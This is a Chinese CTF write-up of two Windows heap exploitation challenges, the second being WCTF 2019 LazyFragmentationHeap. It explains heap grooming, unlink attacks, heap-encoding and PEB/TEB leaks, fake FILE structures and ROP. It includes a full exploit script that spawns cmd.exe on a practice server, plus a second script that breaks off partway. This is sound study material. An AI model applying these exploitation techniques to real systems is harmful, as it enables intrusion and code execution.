  1. 由于windows的heap比较复杂,而且经过不断地调试发现,其布局是不可预测的,所以不太可能像linux下一样通过偏移直接定位到目标chunk;再加上程序刚开始读了一个随机数(0x00 ~ 0xF0),每次对Engineer->language进行malloc的时候,都会在0x200的基础上加上该随机数,使得heap布局更加无法预测。经过长时间地调试发现,可以通过其他类型的操作对象(如teacher等)先对heap上的碎片进行占位,考虑到vector的增长方式是1、2、3、4、6、9、13、19、28、...(capacity),对应的size为0x30、0x60、0x90、0xc0、0x120、0x1B0、0x270、0x390、0x540、...,因此将相应的几个vector占到0x270 bytes大小的chunk,之后对Engineer进行操作的时候,heap布局就会稍微稳定一些:
    1
    2
    3
    4
    5
    6
    7
    0000021d873d7110 0028 0013  [00]   0000021d873d7120    00270 - (busy) ==> vector doctor 
    0000021d873d7390 0028 0028 [00] 0000021d873d73a0 00270 - (busy) ==> vector athlete
    0000021d873d7610 0028 0028 [00] 0000021d873d7620 00270 - (free) ==> vector engineer (old old)
    0000021d873d7890 0028 0028 [00] 0000021d873d78a0 00270 - (busy) ==> vector teacher
    0000021d873d7b10 003a 0028 [00] 0000021d873d7b20 00390 - (free) ==> vector engineer (old)
    0000021d873d7eb0 0055 003a [00] 0000021d873d7ec0 00540 - (busy) ==> vector engineer
    0000021d873d8400 00bc 0055 [00] 0000021d873d8410 00bb0 - (free)
    0x0000021d873d7ec0这个chunk还没有拿到的时候是一个大的freed状态的块,其Blink指向的是0x0000021d873d7620
  2. 同时发现,Engineer->name是没有自动在结尾补”\x00”的,再加上其位置为chunk的Flink所在位置,紧挨着Blink,而且进行拷贝构造的时候,Blink也会拷贝到这个vector中,所以可以通过Engineer->name来对heap进行一个leak,从而找到目标Engineervector的准确位置(也就是leak出来的Blink + 0x280 + 0x280 + 0x3a0 = Blink + 0x8a0)。
  3. 由于vector Engineer的size达到0x540的时候,其成员个数在20 ~ 28变化不会改变vector的大小,所以可以利用这几个成员对Engineer->language进行操作,比如这里我们申请出7个language的buffer进行后续利用(实际上用不上这么多):
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    000001fbc7797fa0 0028 0028  [00]   000001fbc7797fb0    00270 - (free)
    000001fbc7798220 0028 0028 [00] 000001fbc7798230 00270 - (busy)
    000001fbc77984a0 003a 0028 [00] 000001fbc77984b0 00390 - (free)
    000001fbc7798840 0055 003a [00] 000001fbc7798850 00540 - (busy) ==> vector engineer
    000001fbc7798d90 002c 0055 [00] 000001fbc7798da0 002b0 - (busy) ==> language[20]
    000001fbc7799050 002c 002c [00] 000001fbc7799060 002b0 - (busy) ==> language[21]
    000001fbc7799310 002c 002c [00] 000001fbc7799320 002b0 - (free) ==> language[22]
    000001fbc77995d0 002c 002c [00] 000001fbc77995e0 002b0 - (busy) ==> language[23]
    000001fbc7799890 002c 002c [00] 000001fbc77998a0 002b0 - (free) ==> language[24]
    000001fbc7799b50 002c 002c [00] 000001fbc7799b60 002b0 - (busy) ==> language[25]
    000001fbc7799e10 002c 002c [00] 000001fbc7799e20 002b0 - (busy) ==> language[26]
    000001fbc779a0d0 00ef 002c [00] 000001fbc779a0e0 00ee0 - (free)
    000001fbc779afc0 0004 00ef [00] 000001fbc779afd0 00030 - (busy)
    这里显示的是依次free(language[22]); free(language[24]);之后的状态,然后利用UAF改掉language[22]的Flink和Blink,进行unlink attack。
    这样,vector engineer相应成员的language(记为victim_1)就指向了自己,从而可以借此进行任意地址读写。
  4. 这里采用先让该victim指向另一个未被删除的language(记为victim_2)的位置,从而避免了如果直接修改victim_1本身,那么完成了一次任意地址写之后,就控不回victim_1的情况了;另外,由于language是不会被打印出来的,这里要通过修改engineer的另一个类成员的title指针,使其指向另一个未被修改的title指针,从而在list的时候将text的地址打印出来。同样的方法,可以leak任意可读地址的数据。
  5. 需要注意的是,由于我们后续的目标是执行system("cmd.exe"),并且该调用会触发内存分配的操作,所以要求heap结构处于合法的状态,否则会被检测从而报错退出。因此,只要将victim_1的原FlinkBlink的双向链表进行修复即可。
  6. 之后就是一个标准操作,通过binary的IAT表,leak出ntdllucrtbase的基址,并通过ntdll!PebLdr上方存在的PEB相关地址leak出PEB并且计算出TEB的位置(两者偏移固定),然后将TEB->StackLimit给leak出来得到该进程的栈地址,最后通过暴力搜索找到main函数的返回地址。
  7. 最后通过任意地址写在main函数返回地址处写入ROP,从而在返回时触发调用system("cmd.exe")

虽然windows的heap还是具有一定的不确定性,成功率不是100%,主要在于最开始以0x8a0作为偏移这里可能会有不确定性,但是本地的交互速度以及准确率还是很可观的,马上就能有结果。
比较恶心的,本地尚且无法100%,加上远程环境毕竟和我本地的win10不同,所以实际在打远程的时候一度让我怀疑人生,一直都是失败,最后终于是成功了一次。
虽然我曾花了很大的功夫,企图提高成功率,但终究无果,不知道有没有更好的方法。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
from winpwn import *
import sys

# Only errors are logged; the target is a 64-bit binary.
context.log_level = 'error'
context.arch = 'amd64'

# p = process("./windowsland.exe")

p = remote("node3.buuoj.cn", 26564)
# p = remote("127.0.0.1", 10000)

# if len(sys.argv) == 2 and sys.argv[1] == "1":
# windbgx.attach(p)

# Command words sent at the ">> " prompt; choose_func() indexes into this list.
menu = [
"create",
"edit",
"list",
"delete",
"exit"
]

def choose_func(idx):
    """Send the command word `menu[idx]` at the ">> " prompt."""
    p.sendlineafter(">> ", menu[idx])

def add_teacher(age, name, subject):
    """Create a Teacher (kind "1") with the given age, name and subject; college is always "1"."""
    choose_func(0)
    p.sendlineafter("age> ", str(age))
    p.sendlineafter("name> ", name)
    p.sendlineafter("What kind of human> ", "1")
    p.sendlineafter("Which college> ", "1")
    p.sendlineafter("What subject> ", subject)

def add_engineer(age, name, language):
    """Create an Engineer (kind "2"); salary and title are always "1".

    An empty `language` sends just a line terminator at the language prompt.
    """
    choose_func(0)
    p.sendlineafter("age> ", str(age))
    p.sendlineafter("name> ", name)
    p.sendlineafter("What kind of human> ", "2")
    p.sendlineafter("What salary> ", "1")
    p.sendlineafter("Which title> ", "1")
    p.sendlineafter("What language> ", language)

def add_doctor(age, name, hospital):
    """Create a Doctor (kind "3") with the given hospital; "How long" is always "1"."""
    choose_func(0)
    p.sendlineafter("age> ", str(age))
    p.sendlineafter("name> ", name)
    p.sendlineafter("What kind of human> ", "3")
    p.sendlineafter("How long> ", "1")
    p.sendlineafter("Which hospital> ", hospital)

def add_athlete(age, name, sport):
    """Create an Athlete (kind "4") with the given sport; country is always "1"."""
    choose_func(0)
    p.sendlineafter("age> ", str(age))
    p.sendlineafter("name> ", name)
    p.sendlineafter("What kind of human> ", "4")
    p.sendlineafter("Which country> ", "1")
    p.sendlineafter("What sport> ", sport)

def add_pig(age, name):
    """Create a Pig (kind "5"); weight, height and kind are always "1"."""
    choose_func(0)
    p.sendlineafter("age> ", str(age))
    p.sendlineafter("name> ", name)
    p.sendlineafter("What kind of human> ", "5")
    p.sendlineafter("How heavy> ", "1")
    p.sendlineafter("How tall> ", "1")
    p.sendlineafter("Which kind> ", "1")

def edit_teacher(name, subject):
    """Edit the Teacher called `name`, sending `subject` as the new subject."""
    choose_func(1)
    p.sendlineafter("What kind of human> ", "1")
    p.sendlineafter("name> ", name)
    p.sendlineafter("Which subject> ", subject)

def edit_engineer(name, language):
    """Edit the Engineer called `name`, sending `language` at the language prompt.

    The exploit calls this with an empty `language` to make the target free the
    language buffer, and with packed pointers to write through it.
    """
    choose_func(1)
    p.sendlineafter("What kind of human> ", "2")
    p.sendlineafter("name> ", name)
    p.sendlineafter("What language> ", language)

def edit_doctor(name, hospital):
    """Edit the Doctor called `name`, sending `hospital` as the new hospital."""
    choose_func(1)
    p.sendlineafter("What kind of human> ", "3")
    p.sendlineafter("name> ", name)
    p.sendlineafter("Which hospital> ", hospital)

def edit_athlete(name, hospital):
    """Edit the Athlete (kind "4") called `name`, sending `hospital` at the last prompt.

    NOTE(review): the final prompt text and the parameter name are the same as
    in edit_doctor, while add_athlete uses "What sport> " - confirm the prompt
    the target really prints before relying on this helper.
    """
    choose_func(1)
    p.sendlineafter("What kind of human> ", "4")
    p.sendlineafter("name> ", name)
    p.sendlineafter("Which hospital> ", hospital)

def show_all():
    """Send the "list" command; the caller parses the output from `p`."""
    choose_func(2)

def delete_teacher(name):
    """Delete the Teacher (kind "1") called `name`."""
    choose_func(3)
    p.sendlineafter("What kind of human> ", "1")
    p.sendlineafter("name> ", name)

def delete_engineer(name):
    """Delete the Engineer (kind "2") called `name`."""
    choose_func(3)
    p.sendlineafter("What kind of human> ", "2")
    p.sendlineafter("name> ", name)

def delete_doctor(name):
    """Delete the Doctor (kind "3") called `name`."""
    choose_func(3)
    p.sendlineafter("What kind of human> ", "3")
    p.sendlineafter("name> ", name)

def delete_athlete(name):
    """Delete the Athlete (kind "4") called `name`."""
    choose_func(3)
    p.sendlineafter("What kind of human> ", "4")
    p.sendlineafter("name> ", name)

def delete_pig(name):
    """Delete the Pig (kind "5") called `name`."""
    choose_func(3)
    p.sendlineafter("What kind of human> ", "5")
    p.sendlineafter("name> ", name)

def quit():
    """Send the "exit" command (shadows the builtin `quit`)."""
    choose_func(4)

def leak_info(target_item, addr):
    """Read up to 8 bytes at `addr` via the "list" output for engineer 23.

    Engineer "22" is edited with `target_item + 0x30` followed by `addr`; the
    bytes printed after "Engineer 23(23) was promoted as " up to the next comma
    are decoded as a little-endian u64 (NUL-padded on the right, cut to 8).
    """
    edit_engineer("22", p64(target_item + 0x30) + p64(addr))
    show_all()
    p.recvuntil("Engineer 23(23) was promoted as ")
    return u64(p.recvuntil(',', timeout=1)[:-1].ljust(8, "\x00")[:8])

# Heap grooming + unlink. The heap layout is not deterministic, so the whole
# sequence is retried on a fresh connection until the sanity checks pass.
while True:
    try:
        for i in range(10):
            add_doctor(i, str(i), str(i))

        for i in range(10):
            add_athlete(i, str(i), str(i))

        # Engineers 0..9 are created without a language buffer.
        add_engineer(0, "heapaddr", "")
        for i in range(1, 10):
            add_engineer(i, str(i), "")

        for i in range(10):
            add_teacher(i, str(i), str(i))

        for i in range(10, 20):
            add_engineer(i, str(i), "")

        # Engineers 20..26 each get a language buffer.
        for i in range(20, 27):
            add_engineer(i, str(i), str(i))

        # The bytes printed right after the name "heapaddr" are taken as a
        # leaked heap pointer.
        show_all()
        p.recvuntil("heapaddr")
        heap_addr = u64(p.recvuntil("(0)").replace('\r\n', '\n')[:-3].ljust(8, "\x00"))

        assert heap_addr != 0, "heap address should not be 0!"

        current_engineer_vector = heap_addr + 0x8a0 # not always right
        target_item = current_engineer_vector + 0x438

        # unlink attack
        edit_engineer("22", "")
        edit_engineer("24", "")
        edit_engineer("22", p64(target_item - 8) + p64(target_item))
        edit_engineer("21", "")

        # # use chunk 22 to control chunk 23
        edit_engineer("22", p64(target_item + 0x30))

        # now 22 points to itself
        engineer_24_chunk = leak_info(target_item, target_item + 0x60)
        assert(engineer_24_chunk != u64("Engineer")) # not always success

        if len(sys.argv) == 2 and sys.argv[1] == "1":
            windbgx.attach(p)
        break

    except Exception:
        # Any failure (assertion, EOF, parse error) means the layout guess was
        # wrong: reconnect and try again. Ctrl-C is deliberately not caught.
        p.close()
        # p = remote("127.0.0.1", 10000)
        p = remote("node3.buuoj.cn", 26564)
        # p = process("./windowsland.exe")

# fix double linked list
engineer_25_chunk = leak_info(target_item, target_item + 0x90)
chunk_size = engineer_25_chunk - engineer_24_chunk

engineer_22_chunk_flink = current_engineer_vector - 0x3a0
engineer_22_chunk_blink = engineer_24_chunk
engineer_22_chunk = current_engineer_vector + 0x550 + chunk_size * 2
engineer_22_chunk_blink_blink = leak_info(target_item, engineer_22_chunk_blink + 8)

# Each pair below first points engineer 23's buffer at an address (via 22),
# then writes through it (via 23).
edit_engineer("22", p64(engineer_22_chunk_flink + 8))
edit_engineer("23", p64(engineer_22_chunk_blink))
edit_engineer("22", p64(engineer_22_chunk_blink))
edit_engineer("23", p64(engineer_22_chunk_flink) + p64(engineer_22_chunk_blink_blink))

# leak textaddr
text_base = leak_info(target_item, target_item + 0x68) - 0x6418

# leak ntdll
RtlLookupFunctionEntry_iat = text_base + 0x6210
ntdll = leak_info(target_item, RtlLookupFunctionEntry_iat) - 0x40FB0 #0x32BE0#
ntdll_peb_addr = ntdll + 0x151328 #0x16a448#
malloc_iat = text_base + 0x60F0
urctbase = leak_info(target_item, malloc_iat) - 0x112A0 #0xfda0#
system = urctbase + 0xA40C0 #0xAE5C0#
pop_rcx = urctbase + 0x3526E #0x9209d#
str_cmd_exe = urctbase + 0xC80F0 #0xD0CB0#

# leak peb and teb
PEB = leak_info(target_item, ntdll_peb_addr) - 0x80
TEB = PEB + 0x1000

# leak stack address
# Reading at TEB + 0x11 skips the low byte of the qword at TEB + 0x10; the
# shift by 8 puts the leaked bytes back in place.
stack_end = (leak_info(target_item, TEB + 0x11) << 8) + 0x4000

# find where return address is stored
# Scan downwards for at most 0x3000 bytes; reaching the lower bound means the
# saved return address of main was not found.
ret_from_main = text_base + 0x4288
ret_addr_pos = stack_end - 8
while ret_addr_pos > stack_end - 0x3000:
    if leak_info(target_item, ret_addr_pos) == ret_from_main:
        break
    else:
        ret_addr_pos -= 8

# info
print("[+] heap address is: " + hex(heap_addr))
print("[+] current engineer vector address should be: " + hex(current_engineer_vector))
print("[+] text address is: " + hex(text_base))
print("[+] ntdll base is: " + hex(ntdll))
print("[+] urctbase base is: " + hex(urctbase))
print("[+] ntdll_peb_addr address is: " + hex(ntdll_peb_addr))
print("[+] PEB address is: " + hex(PEB))
print("[+] TEB address is: " + hex(TEB))
print("[+] stack end address is: " + hex(stack_end))
print("[+] ret_addr_pos is: " + hex(ret_addr_pos))

if ret_addr_pos == stack_end - 0x3000:
    print("Try again")
    exit(1)

# write ret address
# The buffer write is limited in length, so the ROP chain is written in two
# steps: three qwords at ret_addr_pos, then `system` at ret_addr_pos + 0x18.
edit_engineer("22", p64(ret_addr_pos))
edit_engineer("23", p64(pop_rcx) + p64(str_cmd_exe) + p64(pop_rcx + 1))
edit_engineer("22", p64(ret_addr_pos + 0x18))
edit_engineer("23", p64(system))

# trigger
quit()

p.interactive()

[Windows][WCTF 2019]LazyFragmentationHeap

这题靶机上没有”magic.txt”,所以没法打通,因此只在本地复现了一下,学到不少东西。

题目分析

首先题目提供了一个菜单,包含常规的create、edit、show、delete一个chunk的功能,以及一个额外的open、read一个"magic.txt"文件内容的功能:

1
2
3
4
5
6
1. Allocate buffer for File
2. Edit File content
3. Show content
4. Clean content
5. LazyFileHandler
6. Exit

需要注意的是:

  • 这里我把相关的结构体定义一下:

    1
    2
    3
    4
    5
    6
    7
    00000000 file_buf        struc ; (sizeof=0x28, mappedto_36)
    00000000 exist_status dq ?
    00000008 size dq ?
    00000010 id dq ?
    00000018 edit_status dq ?
    00000020 buffer dq ?
    00000028 file_buf ends
  • create限制大小在0x80 ~ 0x2000之间;

  • edit限制同一个chunk只能进行两次,因为每次edit之前:

    1
    2
    3
    4
    5
    6
    7
    if ( !array[v16].buffer
    || array[v18].edit_status != 0xDDAABEEF1ACDi64
    || array[v18].exist_status != 0xDDAABEEF1ACDi64 )
    {
    puts("Error !");
    exit(-3);
    }

    都会检查edit_status,并且edit之后:

    1
    array[v18].edit_status ^= 0xFACEB00CA4DADDAAui64;

    都会更改这个edit_status,因此下次就不能再写了。

    但是edit里面存在一个典型的通过strlen获取写入长度的漏洞,因此可以覆盖到下一个chunk的头(6 bytes),构造chunk overlap。

  • delete限制只能使用两次。

  • LazyFileHandler里面open次数不受限制,但是read只能两次,但是可以任意size读(只要不超过文件大小)。

利用思路

  1. 首先create几个比较大的chunk,因为是在default heap上分配的,所以碎片比较多,但是size大的chunk不受影响,并且相邻:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
                            +-----------+  
    create(0x3F8, 1) ---> | 0x400 |
    +-----------+ -----
    create(0x408, 2) ---> | 0x410 | |
    +-----------+ |
    create(0x4E8, 3) ---> | 0x4F0 | |
    +-----------+ 0x1000
    create(0x378, 4) ---> | 0x380 | | ---> to be freed
    +-----------+ |
    create(0x378, 5) ---> | 0x380 | | ---> victim chunk
    +-----------+ -----
    create(0x3F8, 6) ---> | 0x400 | ---> gap
    +-----------+
    create(0x378, 7) ---> | 0x380 |
    +-----------+
    create(0x378, 8) ---> | 0x380 |
    +-----------+
  2. 然后通过LazyFileHandler提供的openread读取0x3F8 bytes的内容到chunk 1中,这样在show chunk 1的时候,可以leak出chunk 2的header,但是被encode过了;不过只要手动还原出原始头然后decode,就能得到_HEAP->Encoding了。
  3. 由于edit的逻辑是如果strlen更长的话,读入的size就变长:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    v19 = -1i64;
    v20 = (_BYTE *)array[v18].buffer;
    v21 = array[v18].size;
    do
    ++v19;
    while ( v20[v19] );
    if ( v19 > v21 && array[v18].edit_status == 0xDDAABEEF1ACDi64 )
    {
    v21 = -1i64;
    do
    ++v21;
    while ( v20[v21] );
    }
    if ( read(0, v20, v21) <= 0 )
    {
    puts("read error");
    _exit(1);
    }
    因此对chunk 1进行edit,就可以覆盖到chunk 2的header,将其size修改为0x1000即可覆盖chunk 2、3、4、5。
  4. 由于LazyFileHandler提供的open可以无限调用,并且每次都会申请一个0x60大小的chunk存放FILE结构体;再加上LFH(LowFragmentationHeap)的机制,到一定程度的时候,会开启LFH,即
    分配一个大的chunk用作userblock(这里Slides里面提到的大小是0x1000,可能我本机环境不同,实际上只有0x810)。
    然而实际调试中,先于0x60的chunk,0x20的chunk会先开启LFH,所以同样会从上面构造的0x1000的overlapped chunk中割出0x410作为userblock,这样FILE结构体就落在overlapped chunk + 0x410的位置了。
  5. 此时chunk 3的位置正好存放了一个堆地址,这是原来chunk的Flink,通过show chunk 3,我们可以得到堆地址。(这里地址会有微小的变化,从而影响了后面需要用到堆地址的部分,也造成了最后的exp概率性失败,不过成功率依然很高)。
  6. 既然FILE结构体落在chunk 3、4的空间内,由于LFH位置的不确定性,具体FILE落在userblock的哪个chunk里未知,但是我们可以全部填满伪造的FILE结构体。
    这里主要是要伪造FILEfd = 0,以及buffer = 0xBEEFDAD0000 + 0x28 * 5 + 0x20,即第六个file_buf结构体的buffer处,从而类似于Linux下_IO_FILE的利用,后面调用LazyFileHandler提供的fread_s((void *)array[v9].buffer, v10, 1ui64, v10, Stream);,实际上是从标准输入中读到0xBEEFDAD0000 + 0x28 * 5 + 0x20这个位置,从而可以覆盖掉file_buf->buffer指针,达到任意地址读的功能。
    由于windows的特性,无论是程序本身,还是加载的dll,在一定时间内其基址都是不变的,因此虽然程序运行一次只能调用read file两次,即只能完成一次任意地址读(或写),但是可以多次运行程序读不同的地址即可。
    所以这里先把程序基址和ucrtbase的地址给leak出来了。
  7. 当然仅仅是任意地址读显然是不够的,我们得劫持程序控制流读出flag来。
    注意到在FILE所用的userblock被分配出来之后,我们之前构造的overlapped chunk仍然有0x3E0的空间留下来,而这个0x3E0的空间把chunk 5的header和Flink、Blink给overlap了。
    所以可以分配出这个0x3E0的chunk,修改chunk 5的header为freed状态,以及修改Flink和Blink满足unlink check,再free chunk 4完成unlink attack,在0xBEEFDAD0000 + 0x28 * 4 + 0x20写入了一个指向本身的指针。
    另外,由于chunk 5本身是没有在Freelist或者ListHints中的,所以这些链表都没有corruption,只是可能存在被overlapped的LFH userblock被破坏了的问题,不过不影响后续的利用。
  8. 完成上述利用之后,我们可以构造出这样的primitive:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    file_buf[6]->buffer = &file_buf[6]->edit_status; 
    // then use chunk 6 to edit
    file_buf[7]->edit_status = 0xDDAABEEF1ACD;
    file_buf[7]->buffer = arbitrary_addr;
    file_buf[8]->edit_status = 0xDDAABEEF1ACD;
    file_buf[8]->buffer = &file_buf[6]->edit_status;
    // then use chunk 7 to arbitrary read or write
    ....
    // then use chunk 8 to edit, make chunk 6 can edit again
    file_buf[6]->buffer = &file_buf[6]->edit_status;
    file_buf[6]->edit_status = 0xDDAABEEF1ACD;
    因此只要不断调用以上的primitive,就可以实现任意次数的任意地址读和写。
  9. 但是存在的问题是,p64(0xDDAABEEF1ACD)中存在"\x1A"字符,在windows中,这个字符被用来表示文本流的结尾(EOF),因此如果输入中存在这个字符,那么它后面的字符都不会被接受,那我们上面构造的primitive就用不了了。
    然而注意到,我们做leak和做最后利用的时候是分开的,也就是说read file的功能还只用了一次,于是我们可以同上面提到的任意地址读(或写)一次,将ucrtbase!_pioinfo[0] + 0x38上1 byte的flag标志置为0x09,这样可以把输入流模式从字符流改为二进制流,这样任意字符都可以读入了。
    需要注意的是ucrtbase!_pioinfo[0] + 0x38是个堆地址,所以其偏移是相对稳定的(有时会稍微变化),再加上堆地址我们早就得到了,所以完全可以预测到它的位置。
  10. 那么承接使用上面的primitive,我们可以:
    1
    kernel32.dll -> ntdll.dll -> ntdll!PebLdr - 0x78 --> PEB --> TEB --> stack_end
    完成一条leak链,然后从stack搜索返回地址。
  11. 注意到main函数是不会返回的,只会直接exit,所以这里采用劫持_read函数的返回地址的方法。
    这是因为我们最后写ROP的时候,一定是通过edit功能写的,而归根到底是通过_read写的,那么覆盖_read的返回地址就可以在返回的时候劫持到程序控制流了。
    至于怎么定位_read返回地址的位置,由于我们是通过show功能进行leak的,最终也是通过调用printf打印的,而printf和_read使用的栈帧位置是相同的,即返回地址存放在栈上的地址是一致的。
    故我们只要以printf的返回地址作为标志,搜索栈内存空间,即可同样定位到_read的返回地址所在的位置。
  12. 此外有一个需要注意的点是,虽然AngelBoy的Slides中提到了Child Process Policy,在Ex师傅的博客地下的评论中也有”新版的Windows API新增 PROCESS_MITIGATION_CHILD_PROCESS_POLICY 的功能”这样一句话,但是实际在本地调试中并没有感受到它的存在,虽然最后写system的ROP时候并没有getshell,但其原因貌似在于LFH userblock corruption了,至于实际情况还有待考证。
  13. 因此这里采用Slides中的做法,也是最稳健的做法,即通过任意地址写在.data段上写入一段orw的shellcode,然后ROP调用VirtualProtect修改.data段的权限为RWX,最后跳转到shellcode执行即可。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
from winpwn import *
import sys

# Log all traffic; the target is a 64-bit binary.
context.log_level = 'debug'
context.arch = 'amd64'

# Remote target kept for reference; the Attack class below spawns the local binary.
# p = remote("node3.buuoj.cn", 26659)

class Attack():
def __init__(self):
    """Set up the menu table and the slots that later stages fill with leaks."""
    # Option numbers for the main menu and for the file sub-menu
    # ("open"/"read"/"back"); choose_func() looks words up here.
    self.menu = {
        "create": 1,
        "edit": 2,
        "show": 3,
        "delete": 4,
        "file": 5,
        "exit": 6,
        "open": 1,
        "read": 2,
        "back": 3
    }
    # Fixed address of the target's bookkeeping array.
    self.array_addr = 0xBEEFDAD0000

    # Filled in while the attack runs.
    self.p = None
    self.encoding = None
    self.heap_addr = None
    self.text_base = None
    self.ucrtbase = None
    self.pioinfo_offset = None
    self.kernel32 = None
    self.ntdll = None
    self.PEB = None
    self.TEB = None
    self.stack_end = None
    self.ret_address_in_stack = None

def run(self):
    """Run the full attack, retrying from scratch on assertion or EOF failures.

    Any other exception closes the process and stops without retrying.
    """
    while True:
        try:
            self.do_simple_leak()
            self.do_attack()
            # self.debug()
            self.show_info()
            self.p.interactive()
            break
        except AssertionError:
            # A sanity check on a leaked value failed: start over.
            self.p.close()
            continue
        except EOFError:
            # The target died mid-exploit: start over.
            self.p.close()
            continue
        except:
            self.p.close()
            break

def debug(self):
    """Attach WinDbg to the current process when the only CLI argument is "1"."""
    if len(sys.argv) == 2 and sys.argv[1] == '1':
        windbgx.attach(self.p)

def choose_func(self, choice):
    """Send the option number for the menu word `choice` at "Your choice: "."""
    self.p.sendlineafter("Your choice: ", str(self.menu[choice]), timeout=1)

def create(self, size, idx):
    """Menu "create": allocate a buffer of `size` bytes under the ID `idx`."""
    self.choose_func("create")
    self.p.sendlineafter("Size:", str(size))
    self.p.sendlineafter("ID", str(idx))

def edit(self, idx, content):
    """Menu "edit": send `content` (raw, no line terminator) for the buffer with ID `idx`."""
    self.choose_func("edit")
    self.p.sendlineafter("ID", str(idx), timeout=1)
    self.p.sendafter("Content:", content)

def show(self, idx):
    """Menu "show": request buffer `idx` and consume output up to "Content: ".

    The caller reads the buffer content from `self.p` afterwards.
    """
    self.choose_func("show")
    self.p.sendlineafter("ID", str(idx))
    self.p.recvuntil("Content: ")

def delete(self, idx):
    """Menu "delete": release the buffer with ID `idx`."""
    self.choose_func("delete")
    self.p.sendlineafter("ID", str(idx), timeout=1)

def open_file(self):
    """Enter the file sub-menu, pick "open", then return to the main menu."""
    self.choose_func("file")
    self.choose_func("open")
    self.choose_func("back")

def read_file(self, idx, size, content=None):
    """File sub-menu "read": read `size` bytes into buffer `idx`, then go back.

    When `content` is given it is sent right after the size, for the case
    where the target's read has been redirected to standard input.
    """
    self.choose_func("file")
    self.choose_func("read")
    self.p.sendlineafter("ID", str(idx))
    self.p.sendlineafter("Size:", str(size))
    if content:
        self.p.send(content)
    self.choose_func("back")

def quit(self):
    """Menu "exit"."""
    self.choose_func("exit")

def ctor_heap_head(self, size, flags, prev_size, remain_size):
    """Pack an (unencoded) 8-byte heap chunk header into one integer.

    `size` and `prev_size` are byte counts and are stored in 16-byte units.
    Bit layout of the result: size units at bit 0, `flags` at bit 16, the
    checksum at bit 24, prev_size units at bit 32 and `remain_size` at bit 56.
    The checksum is low byte of the size units XOR its high part XOR `flags`.
    """
    chksum = ((size >> 4) & 0xff) ^ ((size >> 4) >> 8) ^ flags
    val = (size >> 4) | (flags << 16) | (chksum << 24) | (prev_size >> 4 << 32) | (remain_size << 56)
    return val

def ctor_fake_file(self, buf, fileno):
    """Build the byte image of a forged FILE structure.

    `buf` is placed in the buffer-pointer field and `fileno` in the file
    descriptor field; the remaining fields are the fixed values below.
    Returns the concatenated packed fields.
    """
    fake_file = ""
    fake_file += p64(0) + p64(buf) # buffer
    fake_file += p32(0) + p32(0x2080)
    fake_file += p64(fileno) # fileno = 0
    fake_file += p64(0x100) + p64(0)
    fake_file += p64(0xFFFFFFFFFFFFFFFF)
    fake_file += p64(0xFFFFFFFF)
    fake_file += p64(0x0) * 2
    fake_file += p64(0x0)
    fake_file += p64(0)
    return fake_file

def prepare(self):
    """Groom the heap, leak the header encoding and a heap address, plant fake FILEs.

    Sets self.encoding and self.heap_addr. Raises AssertionError when the heap
    leak comes back as zero.
    """
    self.create(0x3F8, 1)
    self.create(0x408, 2)
    self.create(0x4E8, 3)
    self.create(0x378, 4) # --> to be freed (unlink_attack deletes it)
    self.create(0x378, 5) # --> victim
    self.create(0x3F8, 6) # gap
    self.create(0x378, 7)
    self.create(0x378, 8)

    # leak encoding
    # Filling chunk 1 completely lets show() run on into the next chunk header.
    self.open_file()
    self.read_file(1, 0x3F8)
    self.show(1)
    self.p.recvuntil(", use th")
    encode_head = u64(self.p.recv(6) + "\x00\x08")
    self.encoding = self.ctor_heap_head(0x410, 0x1, 0x400, 0x8) ^ encode_head

    # overwrite chunk 2's head
    fake_head = self.ctor_heap_head(0x1000, 0x1, 0x400, 0x8) ^ self.encoding
    self.edit(1, "A" * 0x3F8 + p64(fake_head)[:6])

    # chunk overlap
    self.delete(2)

    # use LFH, which is just at chunk 3's space
    for i in range(7):
        self.open_file()

    # leak heap address
    self.show(3)
    self.heap_addr = u64(self.p.recvline()[:-2].ljust(8, "\x00"))
